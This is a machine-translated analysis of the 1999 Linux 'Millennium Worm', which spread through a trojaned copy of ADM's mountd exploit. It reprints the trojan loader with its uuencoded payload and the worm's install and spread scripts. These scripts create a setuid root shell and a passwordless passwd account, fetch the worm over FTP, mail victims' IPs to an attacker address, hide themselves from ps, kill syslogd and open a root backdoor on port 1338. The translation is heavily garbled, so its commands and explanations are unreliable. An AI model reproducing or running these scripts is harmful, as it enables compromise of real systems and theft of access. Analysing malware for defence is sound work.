Analysis of a worm under Linux from: Max Vision analysis of a worm max vision translation under Linux: QUACK Picking Security Focus 1. Introduction The Millennium Internet Worm - The Millennium Internet Worm is abbreviated as Worm, is a Script and program consisting of a program, it The execution function is to use some remote vulnerabilities of the Linux system to obtain the entry permissions of the system and copy themselves to them and continue to reproduction. The current discovery of WORM is an obvious vulnerability of imap4v10.x, qualcomm popper, bind, rpc.mountd for X86. But it also made a good thing - fixing security vulnerabilities ... Second, technical analysis Our earliest worm is said to be in the remote vulnerability utilization program in AdmMountD2 (this program is attacking Linux RPC.MountD service And you can get the highest permission - not detailed here), but the ADM organization denies the code that has been posted with the Troji program, and will be classified in counterfeit ADM works, you can see ftp://adm.freelsd.net/ ADM / FAKES / MAINTAINED BY NDUBEE@df.ru] This Trojan is placed in the so-called update version of AdmouNTD and indicates that this version is more practical, but in fact hidden code is hiding in AdmGetip In. C, ADM limits the download of this tool at its site, so I will provide it to everyone, just for educational purposes - this wood horse is discovered in 1999-8-15. You can download AdmGgetip-Trojan-Version.c at http://focus.silversand.net/newsite/tool/adm_fake.c.
1. A number of MWorm.TGZ uuencode code in this code segment, when running the program, it will be expanded to directory / var / tmp / TMP, and execute a program called Wormup, the code segment is as follows: // Trojan code from admgetip.c file * fp = fopen ("/ var / tmp / tmp", "w"); // Open file IF (getuid ()! = 0) {fprintf (stderr, "Operation Not permitted / N "); exit (0);} // check whether the uid root fprintf (fp," begin-base64 644 mworm.tgz H4sIANpU / TYAA xaD3CUx3XfOx1wHALEHxts4 / hDRrYE0vHdSQJkgQsIYWhk UCSQHSM4n 6 4ztxujvfHypiuwEr1DqEYsWeTp1MUhOctEnr6biMnSbFY8vA YNyBlGB3ShonZVy3ORmSIZgabMtcf293v7vvOwk7k4k7k5l8o3f7vd23b9 ... [large uuencoded mworm.tgz here] emgL0uE1iuMHR6u1MaA8jUhjOHm2 OzzGLqoNLv0SRpBuNS6XmDYdwe6Z55f bYCEt3q80 XpdMU1NM8J2FDCra2crXTRduAMD0Johcwe8ODFVzDnnwNKJcF8 ivJ 7s3IgAEDBgwYMGDAgAEDBgwYMGDAgAEDPxS AlHjZQIA AIA ==== / n "); // this is a long code through uuecoded system (" (cd / var / tmp; uudecode
21 mWorm.
TGZ -RWXR-XR-X 1 root root 8647 DEC 31 1999 hnamed * -rwxr-xr-x 1 root root 5173 DEC 31 1999 hnamed.c * -rwxr-xr-x 1 root root 477 DEC 31 1999 ip * -rwxr -xr-x 1 root root 1728 DEC 31 1999 Readme-Admins * -RWXR-XR-X 1 root root 5749 DEC 31 1999 BD * -RWXR-XR-x 1 root root 1340 DEC 31 1999 bd.c * -rwxr- XR-x 1 root root 0 DEC 31 1999 cmd * -rwxr-xr-x 1 root root 5292 DEC 31 1999 ftpscan * -rwxr-xr-x 1 root root 911 DEC 31 1999 ftpscan.c * -RWXR-XR-X 1 root root 8750 DEC 31 1999 ftpx * -rwxr-xr-x 1 root root 5108 DEC 31 1999 ftpx.c * -rwxr-xr-x 1 root root 2398 DEC 31 1999 getip.c * -RWXR-XR-X 1 Root root 6436 DEC 31 1999 IM * -RWXR-XR-X 1 root root 2634 DEC 31 1999 im .c * -rwxr-xr-x 1 root root 151 dec 31 1999 infect * -rwxr-xr-x 1 root root 1 DEC 31 1999 Infected * -RWXR-XR-x 1 root root 2755 DEC 31 1999 ip_icmp.h * -rwxr-xr-x 1 root root 6175 DEC 31 1999 mount.h * -rwxr-xr-x 1 root root 5152 DEC 31 1999 mount.x * -rwxr-xr-x 1 root root 2222 DEC 31 1999 mount_clnt.c * -rwxr-xr-x 1 root root 3178 DEC 31 1999 Mount_svc.c * -rwxr-xr-x 1 root root 2366 DEC 31 1999 mount_xdr.c * -rwxr-xr-x 1 root root, 13048 DEC 31 1999 mountd * -rwxr-xr-x 1 root root 7723 DEC 31 1999 Mountd .c * -RWXR-XR-X 1 root root 668 DEC 31 1999 MWD * -RWXR-XR-X 1 root root 561 DEC 31 1999 MWD-FTP * -RWXR-XR-X 1 root root 448 DEC 31 1999 MWD- IMAP * -RWXR-XR-X 1 root root 355 DEC 31 1999 MWD-mounend * -rwxr-xr-x 1 root root 529 DEC 31 1999 MWD-POP * -RWXR-XR-X 1 root root 755 DEC 31 1999 MWI * -rwxr-xr-x 1 root root 844 DEC 31 1999 MWORM * -RWXR-XR-X 1 root root 4617 DEC 31 1999 MWR * -RWXR-XR-X 1 root root 407 DEC 31 1999 mwr.c * -rwxr -xr-x 1 root root 5849 DEC 31 1999 MWS * -RWXR-XR-X 1 root root 1522 DEC 31 1999 mws.c * -rwxr-xr-x 1 root root 1439 DEC 31 1999 PGP * -RWXR-XR- x 1 root root 122
6 DEC 31 1999 prepare * -rwxr-xr-x 1 root root 5430 DEC 31 1999 Q * -RWXR-XR-X 1 root root 1350 DEC 31 1999 QC * -RWXR-XR-x 1 root root 6785 DEC 31 1999 QP * -rwxr-xr-x 1 root root 2886 DEC 31 1999 qp.c * -rwxr-xr-x 1 root root 5680 DEC 31 1999 RemoteCmd * -rwxr-xr-x 1 root root 1834 DEC 31 1999 RemoteCmd.c * -rwxr-xr-x 1 root root 7286 DEC 31 1999 Test * -RWXR-XR-x 1 root root 4355 DEC 31 1999 Test.c * -rwxr-xr-x 1 root root 1037 DEC 31 1999 Wormup * in this file After the start, the first thing is to execute the Wormup code, the content is as follows: # Cat Wormup #! / Bin / sh # Millennium Worm Stript # ./wormup -dist = create a new build # ./wormup & = install the Worm Root) IF [x $ 1 = "x-dist"] Then Echo "Creating Millennium Worm Distribution." INDENT *. C RM -F * ~ Echo -n "compling:" for c in hnamed q bd IM QP ftpscan mwr RemoteCmd ftpx MWS TEST DO RM -F $ C GCC-Wall -O2 $ {C} .c-{$ c echo -n $ c "" DONE RM -F MOUNTD RPCGEN-C Mount.x && gcc -wall -o2 mountd.c -o mountd /> / dev / null 2> / dev / null echo "mountd ..done" echo -n "fixing misc. File Stuff ..." Prin TF ""> cmd printf "0"> Infected Chmod 755 * Touch -t 010100002000.00 * Echo "DONE." RM -F MWORM.TGZ TAR CZF MWORM.TGZ * Echo "Finished. mworm.tgz recreated." exit 0 Fi IF [$ Uid! = 0]; The echo you need root to screen machine, sorry. Exit 0 fi cp / bin / sh/bin/.mwsh && chmod 4755 /bin/.mwsh mkdir / tmp / ... && CP MWorm.tgz / Tmp / .... Echo Mw :: 2222: 555: Millennium Worm: /: / bin / sh >> / etc / passwd CD / TMP / .... && TAR XzVF MWORM.TGZ. / MWORM> / dev / null 2> / dev / null & echo "Millennium Worm (TM). PHEAR THY UNIX LIKE thYself." This code has done the following things to delete and recompile the two informs in Worm.TGZ.
Document. Preparing to clear the CMD file through the network infection, so that you will use it to the Infected file to be cleared, it is used to act as the time limit for all files to set all the files to 2000-1-1, 00 : 00: 00 Resend MWORM.TGZ this guy is placed in / var / tmp 2, and the behavior on the local machine When it is installed in the machine, the worm runs the Wormup script to perform the following work: establish A SUID ROOT shell to /tmp/.mwsh launch worm after the worm is started after the worm is launched: worm will add yourself in /etc/rc.d/rc.local and / etc, / profile sent the system's IP address to the trax31337@hotmail.com This email address, copy itself to the above 3 by freely scanning and attacking the network, the behavior in the network is obtained, the root permission is installed and installed. Worm's machines will be activated and participated in the offensive infection behavior. It is necessary to remember that the script has a -Dist option and is not used immediately. First, let's see what it does: build a SUID root shell / tmp /. MWSH is added to the / etc / passwd account named MW, UID 2222, password empty account to expand mWorm.tgz to / tmp / ... Execute MWORM #cat .MWorm #! / bin / .mwsh # millennium Worm By Anonymous # if you find this on your machine, but Didn't Download It # Well .. You have a problem :) Export path = "/ bin /: / usr / sbin /: / usr / bin: / sbin: / USR / local / bin :. "export ip_a =`. / ip` ./prepare for your d00m mortalz cat << _eof_> cmd MW MW MW MW MW /BIN /.MWSH-C "/ usr / sbin / named" & Export Path = "/ bin /: / usr / sbin /: / usr / bin: / sbin: / usr / local / bin:" mkdir / tmp / .... CD / TMP / .... IF [- F /TMP/.x12] THEN LOGOUT FI FTP $ IP_A MW CD / TMP / .... Get MWORM.TGZ BYE TAR XVZF MWORM.TGZ Touch /TMP/.x12 Nohup ./mWorm & ./ip Mail `Printf" / X74 / X72 / X61 / X78 / X33 / X31 / x33 / x33 / x37 / x40 / / x68 / x6f / x74 / x6d / x61 / x69 / x6c / x2e / x63 / x6f / x6d "` logout _eof_ ./mwd & ./MWD-POP & ./MWD- IMAP & ./Mwd-mountd & ./MWD-FTP & Sleep 60 Nohup ./mwd & nohup ./mwd-pop & nohup ./mwd-mountd & nohup ./mwd-ftp & / BIN / .MWSH -C ./bd This script seems to be the core of this Worm, it performs the following function: Run ready script - attached to the following to create a CMD script - is executed to the target machine Command Send email - IP address containing the host - to trax31337@hotmail.com launches daemon MW
D, MWD-POP, MWD-IMAP, MWD-MOP, AND MWD-FTP Run BD, this is a back door, binding port 1338, and allows authentication of the authentication password after Millennium after millennium. #cat prepare #! / bin / .mwsh # millennium Worm Preparation File # this sets up the stuff to make sales your # machine WAOWNED IN A net and prot war way; d export path = "/ bin /: / usr / sbin /: / usr / bin: / sbin: / usr / local / bin :. "IF [-f /bin/.ps] Then Printf" "else ./readme-admins> / dev / null 2> / dev / null & mv / bin / ps /bin/.ps; "/bin/.ps / $ * grep -V ps grep -v mw / grep -v grep" >> / bin / ps; chmod 755 / bin / ps if [-f /etc/rc.d/rc.local] TEN ECHO "(Sleep 10; CD /TMP/... /; NULL &" / >> / ETC / RC .d / rc.local else echo "(Sleep 10; CD /TMP/.../ ;./mWorm >> / dev / null &" / >> / etc / profile fi chattr Ia / TMP /. ... / *. c /tmp/../MWD* /TMP/.../prepare /bin/.mwsh chattr Ia /etc/rc.d/rc.local / etc / profile / tmp /..../mwo * /tmp/../ip chattr -ia /tmp/...Mount_*.c fi killall -q -9 syslogd gcc -wall -o2 hnamed.c -o hnamed GCC-Wall -O2 MWR.C -O MWR GCC-Wall -O2 QC -OQ GCC-Wall -O2 Remotecmd.c -o RemoteCmd GCC-Wall -O2 Test.c -o test gcc -wall -o2 bd.c O bd gcc -wall -o2 i Mc -O IM gcc -wall -o2 qp.c -o qp gcc -wall -o2 mws.c -o mws gcc -wall -O2 ftpscan.c -o ftpscan gcc -wall -o2 ftpx.c -o ftpx rpc = `Which rpcgen` which rpcgen && $ rpc -c mount.x && gcc -wall -o2 mountd.c -o mountd /bin/.mwsh -c ./bd & don't say more, this script has performed the following work. : Run "readme-admins" and make the host safe. Replace the PS with a fake to hide the WORM to change the Worm files in the RC file when you add yourself to the RC file, can not be deleted - but root can change the syslogd to change the BD with Chatlogd to change the BD, open 1338 Root Shell allows remote root to log in three by Millennium password, delete worm 1, detect host: / etc / passwd is empty
